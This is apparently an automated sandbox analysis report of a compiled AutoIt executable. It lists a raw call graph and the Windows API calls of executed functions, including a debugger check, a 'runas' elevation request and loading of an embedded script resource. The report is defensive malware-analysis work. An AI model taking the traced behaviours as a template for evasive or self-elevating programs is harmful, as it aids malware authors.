106568->106677 106570 8f34d4 106569->106570 106574 8f34f3 _memmove 106569->106574 106572 910db6 Mailbox 59 API calls 106570->106572 106571 910db6 Mailbox 59 API calls 106573 8f350a 106571->106573 106572->106574 106573->106534 106574->106571 106575->106527 106577 8f6ab5 106576->106577 106578 92e41e 106576->106578 106684 8f57a6 60 API calls Mailbox 106577->106684 106700 94f7a1 89 API calls 4 library calls 106578->106700 106581 92e431 106701 94f7a1 89 API calls 4 library calls 106581->106701 106582 8f6ad7 106685 8f57f6 67 API calls 106582->106685 106584 8f6aec 106584->106581 106586 8f6af4 106584->106586 106588 8f7667 59 API calls 106586->106588 106587 92e44d 106591 8f6b61 106587->106591 106589 8f6b00 106588->106589 106686 910957 60 API calls __write_nolock 106589->106686 106593 8f6b6f 106591->106593 106594 92e460 106591->106594 106592 8f6b0c 106595 8f7667 59 API calls 106592->106595 106597 8f7667 59 API calls 106593->106597 106596 8f5c6f CloseHandle 106594->106596 106598 8f6b18 106595->106598 106599 92e46c 106596->106599 106600 8f6b78 106597->106600 106601 8f4750 60 API calls 106598->106601 106602 8f4ddd 136 API calls 106599->106602 106603 8f7667 59 API calls 106600->106603 106604 8f6b26 106601->106604 106605 92e488 106602->106605 106606 8f6b81 106603->106606 106687 8f5850 ReadFile SetFilePointerEx 106604->106687 106608 92e4b1 106605->106608 106613 95955b 122 API calls 106605->106613 106609 8f459b 59 API calls 106606->106609 106702 94f7a1 89 API calls 4 library calls 106608->106702 106610 8f6b98 106609->106610 106614 8f7b2e 59 API calls 106610->106614 106612 8f6b52 106688 8f5aee SetFilePointerEx SetFilePointerEx 106612->106688 106616 92e4a4 106613->106616 106617 8f6ba9 SetCurrentDirectoryW 106614->106617 106618 92e4ac 106616->106618 106619 92e4cd 106616->106619 106623 8f6bbc Mailbox 106617->106623 106620 8f4e4a 84 API calls 106618->106620 106621 8f4e4a 84 API calls 106619->106621 106620->106608 106622 92e4d2 106621->106622 106624 910db6 Mailbox 59 API calls 106622->106624 106626 910db6 Mailbox 59 API calls 106623->106626 106630 92e506 106624->106630 106628 8f6bcf 106626->106628 106629 8f522e 59 API calls 106628->106629 106657 8f6bda Mailbox __wsetenvp 106629->106657 106631 8f750f 59 API calls 106630->106631 106665 92e54f Mailbox 106631->106665 106632 8f6ce7 106633 92e740 106643 92e7d9 106647 8f750f 59 API calls 106647->106665 106649 8f6d0c Mailbox 106679 8f57d4 106649->106679 106651 92e7d1 106654 8f7de1 59 API calls 106654->106657 106657->106632 106657->106643 106657->106651 106657->106654 106689 8f586d 67 API calls _wcscpy 106657->106689 106690 8f6f5d GetStringTypeW 106657->106690 106691 8f6ecc 60 API calls __wcsnicmp 106657->106691 106692 8f6faa GetStringTypeW __wsetenvp 106657->106692 106693 91363d GetStringTypeW _iswctype 106657->106693 106694 8f68dc 165 API calls 3 library calls 106657->106694 106695 8f7213 59 API calls Mailbox 106657->106695 106658 8f7de1 59 API calls 106658->106665 106662 92e792 106665->106633 106665->106647 106665->106658 106665->106662 106667 92e4c8 106667->106649 106669 8f7370 106668->106669 106671 8f741e 106668->106671 106670 910db6 Mailbox 59 API calls 106669->106670 106673 8f73a2 106669->106673 106670->106673 106671->106568 106672 910db6 59 API calls Mailbox 106672->106673 106673->106671 106673->106672 106674->106552 106675->106568 106676->106568 106677->106568 106678->106562 106680 8f5c6f CloseHandle 106679->106680 106681 8f57dc Mailbox 106680->106681 106682 8f5c6f CloseHandle 106681->106682 106683 8f57eb 106682->106683 106684->106582 106685->106584 106686->106592 106687->106612 106688->106591 106689->106657 106690->106657 106691->106657 106692->106657 106693->106657 106694->106657 106695->106657 106700->106581 106701->106587 106702->106667 106755 958d0d 106756 958d20 106755->106756 106757 958d1a 106755->106757 106759 912d55 _free 58 API calls 106756->106759 106761 958d31 106756->106761 106758 912d55 _free 58 API calls 106757->106758 106758->106756 106759->106761 106760 958d43 106761->106760 106762 912d55 _free 58 API calls 106761->106762 106762->106760 106763 8f1016 106768 8f4974 106763->106768 106766 912d40 __cinit 67 API calls 106767 8f1025 106766->106767 106769 910db6 Mailbox 59 API calls 106768->106769 106770 8f497c 106769->106770 106771 8f101b 106770->106771 106775 8f4936 106770->106775 106771->106766 106776 8f493f 106775->106776 106777 8f4951 106775->106777 106778 912d40 __cinit 67 API calls 106776->106778 106779 8f49a0 106777->106779 106778->106777 106780 8f7667 59 API calls 106779->106780 106781 8f49b8 GetVersionExW 106780->106781 106782 8f7bcc 59 API calls 106781->106782 106783 8f49fb 106782->106783 106784 8f7d2c 59 API calls 106783->106784 106789 8f4a28 106783->106789 106785 8f4a1c 106784->106785 106786 8f7726 59 API calls 106785->106786 106786->106789 106787 8f4a93 GetCurrentProcess IsWow64Process 106788 8f4aac 106787->106788 106791 8f4b2b GetSystemInfo 106788->106791 106792 8f4ac2 106788->106792 106789->106787 106790 92d864 106789->106790 106793 8f4af8 106791->106793 106803 8f4b37 106792->106803 106793->106771 106796 8f4b1f GetSystemInfo 106798 8f4ae9 106796->106798 106797 8f4ad4 106799 8f4b37 2 API calls 106797->106799 106798->106793 106801 8f4aef FreeLibrary 106798->106801 106800 8f4adc GetNativeSystemInfo 106799->106800 106800->106798 106801->106793 106804 8f4ad0 106803->106804 106805 8f4b40 LoadLibraryA 106803->106805 106804->106796 106804->106797 106805->106804 106806 8f4b51 GetProcAddress 106805->106806 106806->106804 106807 8f1066 106812 8ff76f 106807->106812 106809 8f106c 106810 912d40 __cinit 67 API calls 106809->106810 106811 8f1076 106810->106811 106813 8ff790 106812->106813 106845 90ff03 106813->106845 106817 8ff7d7 106818 8f7667 59 API calls 106817->106818 106819 8ff7e1 106818->106819 106820 8f7667 59 API calls 106819->106820 106821 8ff7eb 106820->106821 106822 8f7667 59 API calls 106821->106822 106823 8ff7f5 106822->106823 106824 8f7667 59 API calls 106823->106824 106825 8ff833 106824->106825 106826 8f7667 59 API calls 106825->106826 106827 8ff8fe 106826->106827 106855 905f87 106827->106855 106831 8ff930 106832 8f7667 59 API calls 106831->106832 106833 8ff93a 106832->106833 106883 90fd9e 106833->106883 106835 8ff981 106836 8ff991 GetStdHandle 106835->106836 106837 8ff9dd 106836->106837 106838 9345ab 106836->106838 106839 8ff9e5 OleInitialize 106837->106839 106838->106837 106840 9345b4 106838->106840 106839->106809 106890 956b38 64 API calls Mailbox 106840->106890 106842 9345bb 106891 957207 CreateThread 106842->106891 106844 9345c7 CloseHandle 106844->106839 106892 90ffdc 106845->106892 106848 90ffdc 59 API calls 106849 90ff45 106848->106849 106850 8f7667 59 API calls 106849->106850 106851 90ff51 106850->106851 106852 8f7bcc 59 API calls 106851->106852 106853 8ff796 106852->106853 106854 910162 6 API calls 106853->106854 106854->106817 106856 8f7667 59 API calls 106855->106856 106857 905f97 106856->106857 106858 8f7667 59 API calls 106857->106858 106859 905f9f 106858->106859 106899 905a9d 106859->106899 106862 905a9d 59 API calls 106863 905faf 106862->106863 106864 8f7667 59 API calls 106863->106864 106865 905fba 106864->106865 106866 910db6 Mailbox 59 API calls 106865->106866 106867 8ff908 106866->106867 106868 9060f9 106867->106868 106869 906107 106868->106869 106870 8f7667 59 API calls 106869->106870 106871 906112 106870->106871 106872 8f7667 59 API calls 106871->106872 106873 90611d 106872->106873 106874 8f7667 59 API calls 106873->106874 106875 906128 106874->106875 106876 8f7667 59 API calls 106875->106876 106877 906133 106876->106877 106878 905a9d 59 API calls 106877->106878 106879 90613e 106878->106879 106880 910db6 Mailbox 59 API calls 106879->106880 106881 906145 RegisterWindowMessageW 106880->106881 106881->106831 106884 94576f 106883->106884 106885 90fdae 106883->106885 106902 959ae7 60 API calls 106884->106902 106886 910db6 Mailbox 59 API calls 106885->106886 106889 90fdb6 106886->106889 106888 94577a 106889->106835 106890->106842 106891->106844 106903 9571ed 65 API calls 106891->106903 106893 8f7667 59 API calls 106892->106893 106894 90ffe7 106893->106894 106895 8f7667 59 API calls 106894->106895 106896 90ffef 106895->106896 106897 8f7667 59 API calls 106896->106897 106898 90ff3b 106897->106898 106898->106848 106900 8f7667 59 API calls 106899->106900 106901 905aa5 106900->106901 106901->106862 106902->106888 106904 8f1055 106909 8f2649 106904->106909 106907 912d40 __cinit 67 API calls 106908 8f1064 106907->106908 106910 8f7667 59 API calls 106909->106910 106911 8f26b7 106910->106911 106916 8f3582 106911->106916 106914 8f2754 106915 8f105a 106914->106915 106919 8f3416 59 API calls 2 library calls 106914->106919 106915->106907 106920 8f35b0 106916->106920 106919->106914 106921 8f35a1 106920->106921 106922 8f35bd 106920->106922 106921->106914 106922->106921 106923 8f35c4 RegOpenKeyExW 106922->106923 106923->106921 106924 8f35de RegQueryValueExW 106923->106924 106925 8f3614 RegCloseKey 106924->106925 106926 8f35ff 106924->106926 106925->106921 106926->106925 106927 8f3633 106928 8f366a 106927->106928 106929 8f3688 106928->106929 106930 8f36e7 106928->106930 106971 8f36e5 106928->106971 106931 8f374b PostQuitMessage 106929->106931 106932 8f3695 106929->106932 106934 8f36ed 106930->106934 106935 92d0cc 106930->106935 106939 8f36d8 106931->106939 106937 92d154 106932->106937 106938 8f36a0 106932->106938 106933 8f36ca DefWindowProcW 106933->106939 106940 8f3715 SetTimer RegisterWindowMessageW 106934->106940 106941 8f36f2 106934->106941 106982 901070 10 API calls Mailbox 106935->106982 106987 952527 71 API calls _memset 106937->106987 106943 8f36a8 106938->106943 106944 8f3755 106938->106944 106940->106939 106945 8f373e CreatePopupMenu 106940->106945 106947 8f36f9 KillTimer 106941->106947 106948 92d06f 106941->106948 106942 92d0f3 106983 901093 341 API calls Mailbox 106942->106983 106951 92d139 106943->106951 106952 8f36b3 106943->106952 106972 8f44a0 106944->106972 106945->106939 106979 8f443a Shell_NotifyIconW _memset 106947->106979 106955 92d074 106948->106955 106956 92d0a8 MoveWindow 106948->106956 106951->106933 106986 947c36 59 API calls Mailbox 106951->106986 106958 8f36be 106952->106958 106959 92d124 106952->106959 106953 92d166 106953->106933 106953->106939 106960 92d097 SetFocus 106955->106960 106961 92d078 106955->106961 106956->106939 106957 8f370c 106980 8f3114 DeleteObject DestroyWindow Mailbox 106957->106980 106958->106933 106984 8f443a Shell_NotifyIconW _memset 106958->106984 106985 952d36 81 API calls _memset 106959->106985 106960->106939 106961->106958 106964 92d081 106961->106964 106981 901070 10 API calls Mailbox 106964->106981 106966 92d134 106966->106939 106969 92d118 106970 8f434a 68 API calls 106969->106970 106970->106971 106971->106933 106973 8f4539 106972->106973 106974 8f44b7 _memset 106972->106974 106973->106939 106975 8f407c 61 API calls 106974->106975 106977 8f44de 106975->106977 106976 8f4522 KillTimer SetTimer 106976->106973 106977->106976 106978 92d4ab Shell_NotifyIconW 106977->106978 106978->106976 106979->106957 106980->106939 106981->106939 106982->106942 106983->106958 106984->106969 106985->106966 106986->106971 106987->106953 106988 93416f 106992 945fe6 106988->106992 106990 93417a 106991 945fe6 85 API calls 106990->106991 106991->106990 106998 946020 106992->106998 106999 945ff3 106992->106999 106993 946022 107004 8f9328 84 API calls Mailbox 106993->107004 106994 946027 106996 8f9837 84 API calls 106994->106996 106997 94602e 106996->106997 107000 8f7b2e 59 API calls 106997->107000 106998->106990 106999->106993 106999->106994 106999->106998 107001 94601a 106999->107001 107000->106998 107003 8f95a0 59 API calls _wcsstr 107001->107003 107003->106998 107004->106994 107005 92fdfc 107019 8fab30 Mailbox _memmove 107005->107019 107008 8f9c90 Mailbox 59 API calls 107008->107019 107009 8fb525 107065 959e4a 89 API calls 4 library calls 107009->107065 107012 9309e5 107070 959e4a 89 API calls 4 library calls 107012->107070 107013 930055 107064 959e4a 89 API calls 4 library calls 107013->107064 107015 8fa057 107017 8fb475 107024 8f8047 59 API calls 107017->107024 107019->107008 107019->107009 107019->107015 107030 8f9f37 Mailbox 107019->107030 107032 8f7de1 59 API calls 107019->107032 107038 910db6 59 API calls Mailbox 107019->107038 107039 8fb2b6 107019->107039 107041 8f9ea0 341 API calls 107019->107041 107042 93086a 107019->107042 107044 930878 107019->107044 107046 93085c 107019->107046 107047 8fb21c 107019->107047 107050 946e8f 59 API calls 107019->107050 107053 96df23 107019->107053 107059 96c193 85 API calls 2 library calls 107019->107059 107060 96c2e0 96 API calls Mailbox 107019->107060 107061 957956 59 API calls Mailbox 107019->107061 107062 96bc6b 341 API calls Mailbox 107019->107062 107063 94617e 59 API calls Mailbox 107019->107063 107020 8fb47a 107020->107012 107020->107013 107021 930064 107022 910db6 59 API calls Mailbox 107022->107030 107024->107015 107026 8f8047 59 API calls 107026->107030 107028 8f7667 59 API calls 107028->107030 107029 946e8f 59 API calls 107029->107030 107030->107013 107030->107015 107030->107017 107030->107020 107030->107022 107030->107026 107030->107028 107030->107029 107031 912d40 67 API calls __cinit 107030->107031 107033 9309d6 107030->107033 107035 8fa55a 107030->107035 107056 8fc8c0 341 API calls 2 library calls 107030->107056 107057 8fb900 60 API calls Mailbox 107030->107057 107031->107030 107032->107019 107069 959e4a 89 API calls 4 library calls 107033->107069 107068 959e4a 89 API calls 4 library calls 107035->107068 107038->107019 107058 8ff6a3 341 API calls 107039->107058 107041->107019 107043 8f9c90 Mailbox 59 API calls 107042->107043 107043->107046 107067 959e4a 89 API calls 4 library calls 107044->107067 107046->107015 107066 94617e 59 API calls Mailbox 107046->107066 107048 8f9d3c 60 API calls 107047->107048 107049 8fb22d 107048->107049 107051 8f9d3c 60 API calls 107049->107051 107050->107019 107051->107039 107054 96cadd 130 API calls 107053->107054 107055 96df33 107054->107055 107055->107019 107056->107030 107057->107030 107058->107009 107059->107019 107060->107019 107061->107019 107062->107019 107063->107019 107064->107021 107065->107046 107066->107015 107067->107046 107068->107015 107069->107012 107070->107015

                                                                  Executed Functions

                                                                  Function 008F3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008F3B68
                                                                  • IsDebuggerPresent.KERNEL32 ref: 008F3B7A
                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,009B52F8,009B52E0,?,?), ref: 008F3BEB
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                    • Part of subcall function 0090092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008F3C14,009B52F8,?,?,?), ref: 0090096E
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 008F3C6F
                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009A7770,00000010), ref: 0092D281
                                                                  • SetCurrentDirectoryW.KERNEL32(?,009B52F8,?,?,?), ref: 0092D2B9
                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009A4260,009B52F8,?,?,?), ref: 0092D33F
                                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 0092D346
                                                                    • Part of subcall function 008F3A46: GetSysColorBrush.USER32(0000000F), ref: 008F3A50
                                                                    • Part of subcall function 008F3A46: LoadCursorW.USER32(00000000,00007F00), ref: 008F3A5F
                                                                    • Part of subcall function 008F3A46: LoadIconW.USER32(00000063), ref: 008F3A76
                                                                    • Part of subcall function 008F3A46: LoadIconW.USER32(000000A4), ref: 008F3A88
                                                                    • Part of subcall function 008F3A46: LoadIconW.USER32(000000A2), ref: 008F3A9A
                                                                    • Part of subcall function 008F3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008F3AC0
                                                                    • Part of subcall function 008F3A46: RegisterClassExW.USER32(?), ref: 008F3B16
                                                                    • Part of subcall function 008F39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008F3A03
                                                                    • Part of subcall function 008F39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F3A24
                                                                    • Part of subcall function 008F39D5: ShowWindow.USER32(00000000,?,?), ref: 008F3A38
                                                                    • Part of subcall function 008F39D5: ShowWindow.USER32(00000000,?,?), ref: 008F3A41
                                                                    • Part of subcall function 008F434A: _memset.LIBCMT ref: 008F4370
                                                                    • Part of subcall function 008F434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F4415
                                                                  Strings
                                                                  • This is a third-party compiled AutoIt script., xrefs: 0092D279
                                                                  • runas, xrefs: 0092D33A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                                  • API String ID: 529118366-3287110873
                                                                  • Opcode ID: c82ae248f7c7b82535d4d3792ba3221a933d1102fa1d99a526a06b38af3da1e1
                                                                  • Instruction ID: b08d1ffa5053bd6f62a26fa1c062d40de46a2725e2ed95773db6dbbc85fe2d47
                                                                  • Opcode Fuzzy Hash: c82ae248f7c7b82535d4d3792ba3221a933d1102fa1d99a526a06b38af3da1e1
                                                                  • Instruction Fuzzy Hash: 8451F13190D20CAAEF11EBB8ED16AFD7B78FF45724F004165F621F21A2DA704A45DB22
                                                                  Function 008F49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 996 8f49a0-8f4a00 call 8f7667 GetVersionExW call 8f7bcc 1001 8f4b0b-8f4b0d 996->1001 1002 8f4a06 996->1002 1004 92d767-92d773 1001->1004 1003 8f4a09-8f4a0e 1002->1003 1006 8f4a14 1003->1006 1007 8f4b12-8f4b13 1003->1007 1005 92d774-92d778 1004->1005 1008 92d77a 1005->1008 1009 92d77b-92d787 1005->1009 1010 8f4a15-8f4a4c call 8f7d2c call 8f7726 1006->1010 1007->1010 1008->1009 1009->1005 1011 92d789-92d78e 1009->1011 1019 92d864-92d867 1010->1019 1020 8f4a52-8f4a53 1010->1020 1011->1003 1013 92d794-92d79b 1011->1013 1013->1004 1015 92d79d 1013->1015 1018 92d7a2-92d7a5 1015->1018 1021 92d7ab-92d7c9 1018->1021 1022 8f4a93-8f4aaa GetCurrentProcess IsWow64Process 1018->1022 1023 92d880-92d884 1019->1023 1024 92d869 1019->1024 1020->1018 1025 8f4a59-8f4a64 1020->1025 1021->1022 1030 92d7cf-92d7d5 1021->1030 1028 8f4aaf-8f4ac0 1022->1028 1029 8f4aac 1022->1029 1026 92d886-92d88f 1023->1026 1027 92d86f-92d878 1023->1027 1031 92d86c 1024->1031 1032 8f4a6a-8f4a6c 1025->1032 1033 92d7ea-92d7f0 1025->1033 1026->1031 1036 92d891-92d894 1026->1036 1027->1023 1037 8f4b2b-8f4b35 GetSystemInfo 1028->1037 1038 8f4ac2-8f4ad2 call 8f4b37 1028->1038 1029->1028 1039 92d7d7-92d7da 1030->1039 1040 92d7df-92d7e5 1030->1040 1031->1027 1041 92d805-92d811 1032->1041 1042 8f4a72-8f4a75 1032->1042 1034 92d7f2-92d7f5 1033->1034 1035 92d7fa-92d800 1033->1035 1034->1022 1035->1022 1036->1027 1043 8f4af8-8f4b08 1037->1043 1053 8f4b1f-8f4b29 GetSystemInfo 1038->1053 1054 8f4ad4-8f4ae1 call 8f4b37 1038->1054 1039->1022 1040->1022 1044 92d813-92d816 1041->1044 1045 92d81b-92d821 1041->1045 1047 92d831-92d834 1042->1047 1048 8f4a7b-8f4a8a 1042->1048 1044->1022 1045->1022 1047->1022 1050 92d83a-92d84f 1047->1050 1051 92d826-92d82c 1048->1051 1052 8f4a90 1048->1052 1055 92d851-92d854 1050->1055 1056 92d859-92d85f 1050->1056 1051->1022 1052->1022 1057 8f4ae9-8f4aed 1053->1057 1061 8f4b18-8f4b1d 1054->1061 1062 8f4ae3-8f4ae7 GetNativeSystemInfo 1054->1062 1055->1022 1056->1022 1057->1043 1060 8f4aef-8f4af2 FreeLibrary 1057->1060 1060->1043 1061->1062 1062->1057
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 008F49CD
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  • GetCurrentProcess.KERNEL32(?,0097FAEC,00000000,00000000,?), ref: 008F4A9A
                                                                  • IsWow64Process.KERNEL32(00000000), ref: 008F4AA1
                                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 008F4AE7
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 008F4AF2
                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 008F4B23
                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 008F4B2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                  • String ID:
                                                                  • API String ID: 1986165174-0
                                                                  • Opcode ID: 479aa193ed7e6af4f789a55727d7055229d62bcc3004978674eb35df182a9c37
                                                                  • Instruction ID: 6d380ea40e1c0d6267ffc43da03bbd81f77331701eec28e7ac116824720872c3
                                                                  • Opcode Fuzzy Hash: 479aa193ed7e6af4f789a55727d7055229d62bcc3004978674eb35df182a9c37
                                                                  • Instruction Fuzzy Hash: 2B91E63198EBD8DEC731CB7894501BBBFF5BF2A300B4449AED1CB93A42D224A548D759
                                                                  Function 008F4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1063 8f4e89-8f4ea1 CreateStreamOnHGlobal 1064 8f4ea3-8f4eba FindResourceExW 1063->1064 1065 8f4ec1-8f4ec6 1063->1065 1066 92d933-92d942 LoadResource 1064->1066 1067 8f4ec0 1064->1067 1066->1067 1068 92d948-92d956 SizeofResource 1066->1068 1067->1065 1068->1067 1069 92d95c-92d967 LockResource 1068->1069 1069->1067 1070 92d96d-92d98b 1069->1070 1070->1067
                                                                  APIs
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008F4D8E,?,?,00000000,00000000), ref: 008F4E99
                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008F4D8E,?,?,00000000,00000000), ref: 008F4EB0
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,008F4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008F4E2F), ref: 0092D937
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,008F4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008F4E2F), ref: 0092D94C
                                                                  • LockResource.KERNEL32(008F4D8E,?,?,008F4D8E,?,?,00000000,00000000,?,?,?,?,?,?,008F4E2F,00000000), ref: 0092D95F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                  • String ID: SCRIPT
                                                                  • API String ID: 3051347437-3967369404
                                                                  • Opcode ID: 91b50fe47f6e56e55f9f719e2ba6c49cb44ccfe9f041a0ec1b291924eacf3e41
                                                                  • Instruction ID: 9ea2dfd885dc30df841cabebe132d6fe105e27ae2265673c4203b01e86eb321e
                                                                  • Opcode Fuzzy Hash: 91b50fe47f6e56e55f9f719e2ba6c49cb44ccfe9f041a0ec1b291924eacf3e41
                                                                  • Instruction Fuzzy Hash: 1F119E75200304BFD7208B65EC48F677BBAFFC5B21F204269F61AD6250DB61EC40D660
                                                                  Function 008FFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID:
                                                                  • API String ID: 3964851224-0
                                                                  • Opcode ID: be8b3242b62e7c23d0871416cde17a4a56d5227b2d67b31005a6a2a69f071fab
                                                                  • Instruction ID: 1f3b10f11ed3cca11f2afe6c13f6c9da5d0d075eee5befb1a8bd91b7829e5b95
                                                                  • Opcode Fuzzy Hash: be8b3242b62e7c23d0871416cde17a4a56d5227b2d67b31005a6a2a69f071fab
                                                                  • Instruction Fuzzy Hash: 939259706083458FD720DF28C480B6ABBE5BF85304F15896DE99A8B3A2D775EC45CF92
                                                                  Function 0095445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,0092E398), ref: 0095446A
                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 0095447B
                                                                  • FindClose.KERNEL32(00000000), ref: 0095448B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                  • String ID:
                                                                  • API String ID: 48322524-0
                                                                  • Opcode ID: 8503b98c6f8934d0d655c6a309ad03bba8fa2ce18f5e36c33253fd8f66a2d84f
                                                                  • Instruction ID: 342b87fd147e492ba49cd9245863f320f62a5f0ebaa253ccd4d46217a4ca2b74
                                                                  • Opcode Fuzzy Hash: 8503b98c6f8934d0d655c6a309ad03bba8fa2ce18f5e36c33253fd8f66a2d84f
                                                                  • Instruction Fuzzy Hash: 1FE0D833428500674610AF39EC0D4E9779C9F0537AF100715FC39D10E0E7745984A796
                                                                  Function 008FE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Variable must be of type 'Object'., xrefs: 00933E62
                                                                  Memory Dump Source
